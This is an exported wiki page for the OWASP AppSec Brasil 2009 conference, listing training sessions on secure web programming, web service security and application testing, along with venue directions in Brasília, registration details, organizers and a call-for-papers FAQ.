''André Ricardo Abed Grégio e Vitor Monte Afonso'', CTI/MCT, ''Paulo Licio de Geus'', IC/UNICAMP &lt;br /&gt;
&lt;br /&gt;
&amp;lt;span style=&amp;quot;color: rgb(255, 0, 0);&amp;quot;&amp;gt;This course will be in Portuguese only.&amp;lt;/span&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Date: Oct 28&amp;lt;br&amp;gt; Time: afternoon &lt;br /&gt;
&lt;br /&gt;
This course aims to present the principles and techniques of secure programming, specially web application programming, showing fundamental concepts and detailing the vulnerabilities which could be explored and focusing on the methods to mitigate those faults. We will present some examples of how some OWASP Top Ten vulnerabilities can be corrected in different programming languages, with code vulnerable snippets from code reviews conducted by the training authors. Some tools for detecting attacks and web application vulnerability testing will be presented. &lt;br /&gt;
&lt;br /&gt;
[http://www.owasp.org/images/9/9f/AppSecBR2009_VAfonso_AGregio_PGeus.pdf Slides] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''Computational Security in Web Service Development''' &lt;br /&gt;
&lt;br /&gt;
''Júlio Cesar Estrella et al'', ICMC/USP &lt;br /&gt;
&lt;br /&gt;
&amp;lt;span style=&amp;quot;color: rgb(255, 0, 0);&amp;quot;&amp;gt;This course will be in Portuguese only.&amp;lt;/span&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Date: Oct 28&amp;lt;br&amp;gt; Time: all day &lt;br /&gt;
&lt;br /&gt;
This training session will present the development of distributed applications using the concept of SOA and considering its computational security. For the development of the client and server applications, we will use the Apache Axis2 engine. The basic components of Axis2 will be presented, as well as the web service invocation types and models, and their main characteristics. Two web service security standards will be seen in the context of the Apache Axis2 engine: WS-Security and SAML. The methodology used for this training session includes theory and practice, touching the fundamental concepts of the Axis2 engine and the construction of real applications with focus on security. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''Security Technologies in Web Services''' &lt;br /&gt;
&lt;br /&gt;
''Eduardo Takeo Ueda e Wilson Vicente Ruggiero'', Poli/USP &lt;br /&gt;
&lt;br /&gt;
&amp;lt;span style=&amp;quot;color: rgb(255, 0, 0);&amp;quot;&amp;gt;This course will be in Portuguese only.&amp;lt;/span&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Data: Oct 28&amp;lt;br&amp;gt; Time: morning &lt;br /&gt;
&lt;br /&gt;
Due to their integration characteristics and because they use open standards, web services have become an area of great interest to academics and industry. Firstly, we will introduce the basic concepts of a service oriented architecture, so the training can be self sufficient. After, we will present the main security standards and specifications in development and which must be adopted for web services. Lastly, the training ends with an exposition of the current challenges in web service security. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''Hands on Web Application Testing using the OWASP Testing Guide.''' &lt;br /&gt;
&lt;br /&gt;
''Matt Tesauro'', OWASP &lt;br /&gt;
&lt;br /&gt;
Date: Oct 27 and 28 (2 days)&amp;lt;br&amp;gt; Time: all day &lt;br /&gt;
&lt;br /&gt;
The training will cover the critical areas of web application testing using the OWASP Testing Guide v3 as the framework for testing an application and the OWASP Live CD for the tools to test with. A custom version of the OWASP Live CD will be created for the training. It will include a self-contained testing environment providing vulnerable applications so that both tools and the applications to test them on are provided. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;span style=&amp;quot;color: rgb(255, 0, 0);&amp;quot;&amp;gt;This course requires a laptop for the hands-on activities. Each student should bring its own laptop.&amp;lt;/span&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[http://www.owasp.org/images/9/97/Matt.tesauro.hands.on.zip Slides] &lt;br /&gt;
&lt;br /&gt;
==== Venue  ====&lt;br /&gt;
&lt;br /&gt;
[[Image:CongressoNacional.jpg|The Palácio do Congresso building]] &lt;br /&gt;
&lt;br /&gt;
The event will be held in Brasília, Brazil's Capital at: Câmara dos Deputados, Anexo II, Praça dos Três Poderes. &lt;br /&gt;
&lt;br /&gt;
You can check the location at [http://maps.google.com/maps?f=q&amp;amp;source=s_q&amp;amp;hl=pt-BR&amp;amp;geocode=&amp;amp;q=anexo+II,+camara+dos+deputados,+brasilia&amp;amp;sll=37.0625,-95.677068&amp;amp;sspn=43.934478,79.101563&amp;amp;ie=UTF8&amp;amp;t=h&amp;amp;ll=-15.800058,-47.865822&amp;amp;spn=0.01309,0.019312&amp;amp;z=16 Google Maps] &lt;br /&gt;
&lt;br /&gt;
'''Training Sessions''' &lt;br /&gt;
&lt;br /&gt;
All training sessions will happen in the Deputy Chamber Cororate University (CEFOR), which is located at the following address: &lt;br /&gt;
&lt;br /&gt;
Centro de Formação, Treinamento e Aperfeiçoamente da Câmara dos Deputados, via N3, Projeção L, Setor de Garagens Ministeriais Norte, Complexo Avançado da Câmara dos Deputados, Bloco B. &lt;br /&gt;
&lt;br /&gt;
Check its location on [http://maps.google.com.br/maps/ms?ie=UTF8&amp;amp;hl=pt-BR&amp;amp;msa=0&amp;amp;ll=-15.793895,-47.864009&amp;amp;spn=0.005017,0.006866&amp;amp;t=h&amp;amp;z=17&amp;amp;msid=106468407154665154285.0004577c477849eda80f3 this map]. &lt;br /&gt;
&lt;br /&gt;
''How to get there'' &lt;br /&gt;
&lt;br /&gt;
We are trying to provided a transfer from somewhere in the ''Esplanada dos Ministérios'', which is accessible by bus. Any new information on this will be posted in this page. &lt;br /&gt;
&lt;br /&gt;
To go by taxi, show the map to the driver. It is improbable tha any taxi driver will be able to get you to the training sessions location just by reading is address. With the map, arriving to the location is quite easy and fast from any downtown location. &lt;br /&gt;
&lt;br /&gt;
We strongly recommend against getting to the trainings in your own car, as it is very difficult to find unused parking slots in this part of town. &lt;br /&gt;
&lt;br /&gt;
==== Registration  ====&lt;br /&gt;
&lt;br /&gt;
'''Registration and Conference Fees''' &lt;br /&gt;
&lt;br /&gt;
There will be no fees for this conference, only '''registration''' is required to participate. The registration form can be found [http://www2.camara.gov.br/eventos/appsec-brasil-2009-confer.-inter.-de-seguranca-de/inscricao here]. &lt;br /&gt;
&lt;br /&gt;
The training session registration form can be found [https://creator.zoho.com/lucas.ferreira/appsec-mini-cursos/ here] &lt;br /&gt;
&lt;br /&gt;
==== Committees  ====&lt;br /&gt;
&lt;br /&gt;
'''Conference Committee''' &lt;br /&gt;
&lt;br /&gt;
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org &lt;br /&gt;
&lt;br /&gt;
2009 AppSec Brasil Program Committee (appsec.brasil@camara.gov.br): &lt;br /&gt;
&lt;br /&gt;
*Conference Chair: Lucas C. Ferreira (lucas.ferreira at owasp.org) &lt;br /&gt;
*Tutorials Organization: Eduardo V. C. Neves (eduardo.neves at owasp.org) &lt;br /&gt;
*Tracks Organization: Wagner Elias (wagner.elias at owasp.org)&lt;br /&gt;
&lt;br /&gt;
Organization Team &lt;br /&gt;
&lt;br /&gt;
*Cassio Goldschmidt (cassio 'at' owasp.org) &lt;br /&gt;
*Kuai Hinojosa (kuai.hinojosa 'at' owasp.org) &lt;br /&gt;
*Leonardo Cavallari - (leo.cavallari 'at' owasp.org) &lt;br /&gt;
*Thiago Lechuga (thiagoalz 'at' gmail.com) &lt;br /&gt;
*Dinis Cruz (dinis.cruz 'at' owasp.org)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
==== Links and other information  ====&lt;br /&gt;
&lt;br /&gt;
Event page on LinkedIn: http://events.linkedin.com/OWASP-AppSec-Brasil/pub/65160 &lt;br /&gt;
&lt;br /&gt;
==== FAQ  ====&lt;br /&gt;
&lt;br /&gt;
'''Q. Who is promoting the conference?''' &lt;br /&gt;
&lt;br /&gt;
A. This conference is being supported and organized by the [http://www.ticontrole.gov.br TI-Controle Community] and the [http://www.camara.gov.br Deputy Chamber], with the contents (presentations, keynotes, training, etc) selected by the OWASP [[Brazilian]] Chapter. &lt;br /&gt;
&lt;br /&gt;
'''Q. What will it cost?''' &lt;br /&gt;
&lt;br /&gt;
A. Nothing. Thanks to its sponsor, the conference will be free of charge. However we have limited seats, so please register early. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''''Call For Papers''''' &lt;br /&gt;
&lt;br /&gt;
'''Q. What is the Open Web Application Security Project (OWASP)?''' &lt;br /&gt;
&lt;br /&gt;
The Open Web Application Security Project (OWASP) is a worldwide free and open community focused on improving the security of application software. Our mission is to make application security visible, so that people and organizations can make informed decisions about true application security risks. Everyone is free to participate in OWASP and all of our materials are available under a free and open software license. The OWASP Foundation is a 501c3 not-for-profit charitable organization that ensures the ongoing availability and support for our work with your support. &lt;br /&gt;
&lt;br /&gt;
'''Q. How many speaking slots are there?''' &lt;br /&gt;
&lt;br /&gt;
Please see the Conference Agenda in its [http://www.owasp.org/index.php/AppSec_Brasil_2009 main page]. &lt;br /&gt;
&lt;br /&gt;
'''Q. What are the submission deadlines?''' &lt;br /&gt;
&lt;br /&gt;
The CFP submission deadline is July 11th, with the final version of the presentation material due September 15th 2009. &lt;br /&gt;
&lt;br /&gt;
'''Q: Who is allowed to submit presentations?''' &lt;br /&gt;
&lt;br /&gt;
A: Original authors may submit presentations for consideration. Third party representatives such as PR firms or Speaker Representatives MAY NOT submit materials on behalf of a potential speaker. &lt;br /&gt;
&lt;br /&gt;
'''Q: Why aren't Third Parties such as PR Firms allowed to submit presentations?''' &lt;br /&gt;
&lt;br /&gt;
A: Due to potential copyright and intellectual property liability issues as well as the need for OWASP to have direct contact with potential and selected presenters to expedite selection and deliverable materials, we require that only original authors of presentations submit for the Call for Papers. Third party representatives such as PR firms or Speaker Representatives MAY NOT submit materials on behalf of a potential speaker. &lt;br /&gt;
&lt;br /&gt;
'''Q: Are there any restrictions on the content of the presentations?''' &lt;br /&gt;
&lt;br /&gt;
A: Yes, all presentations must respect the rules defined in the OWASP [[Speaker Agreement]]. &lt;br /&gt;
&lt;br /&gt;
'''Q: How long will I have to wait before I am notified if I have been accepted or denied?''' &lt;br /&gt;
&lt;br /&gt;
A: Submitters will be notified of the status (acceptance or denial) on August 7th 2009. &lt;br /&gt;
&lt;br /&gt;
'''Q. Is there an honorarium for presenters?''' &lt;br /&gt;
&lt;br /&gt;
No. OWASP is committed to making its conferences available to the widest possible audience. In order to do this OWASP keeps the entrance free for the AppSec Brazil 2009 to make the conference accessible. As a result we are unable to provide a monetary honorarium but we welcome our speakers as our guests to the conference where they can network with other security professionals. We will provide lodging and domestic air travel for one presenter for each selected work. &lt;br /&gt;
&lt;br /&gt;
'''Q: I have been accepted. What are the materials that I have to turn in and what are the deadlines?''' &lt;br /&gt;
&lt;br /&gt;
A: The following is a list of materials that are required from each accepted presentation. Failure to proceed these materials by the deadlines set forth for the event the presentation was accepted for will result in cancellation of acceptance. &lt;br /&gt;
&lt;br /&gt;
*A confirmed [[Speaker Agreement|Speaker Agreement]] (July 15th 2009) &lt;br /&gt;
*Presentation in PowerPoint or Keynote format using the [http://www.owasp.org/images/5/54/Presentation_template.ppt OWASP Template] (September 15th 2009) &lt;br /&gt;
*Detailed Bibliography of resources, co-authors, etc. (September 15th 2009) &lt;br /&gt;
*Optional White Paper for inclusion on CD (September 15th 2009)&lt;br /&gt;
&lt;br /&gt;
'''Q: Do I have to submit a White Paper?''' &lt;br /&gt;
&lt;br /&gt;
A: No. We would certainly appreciate any White Papers that can be included on the conference web site but they are not required. If you have written an existing white paper to go along with your presentation, please submit it with your CFP submission. Submissions with attached White Papers will receive additional consideration. &lt;br /&gt;
&lt;br /&gt;
'''Q: What if I have a co-author who is not presenting. How do I cite the person(s)?''' &lt;br /&gt;
&lt;br /&gt;
A: All co-authors and works that have been used should be cited in a detailed bibliography that will be published on the Conference CD. &lt;br /&gt;
&lt;br /&gt;
'''Q: I have been accepted and would like to add co-presenters. Can I still do this?''' &lt;br /&gt;
&lt;br /&gt;
A: No. Co-presenters should have been added at the time that the Presentation was submitted. They may attend the conference and present if they register as any other participant. &lt;br /&gt;
&lt;br /&gt;
'''Q: My PR company/friends/co-workers/family would like to come see me give my presentation. Will they be allowed in for free?''' &lt;br /&gt;
&lt;br /&gt;
A: Yes, but they need to register on the conference web site as any other conference participant. &lt;br /&gt;
&lt;br /&gt;
'''Q. I have more questions''' &lt;br /&gt;
&lt;br /&gt;
A: Email appsec.brasil@camara.gov.br concerning this event. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_AppSec_Conference]]&lt;/div&gt;</summary>
		<author><name>Ulisses Castro</name></author>	</entry>

	</feed>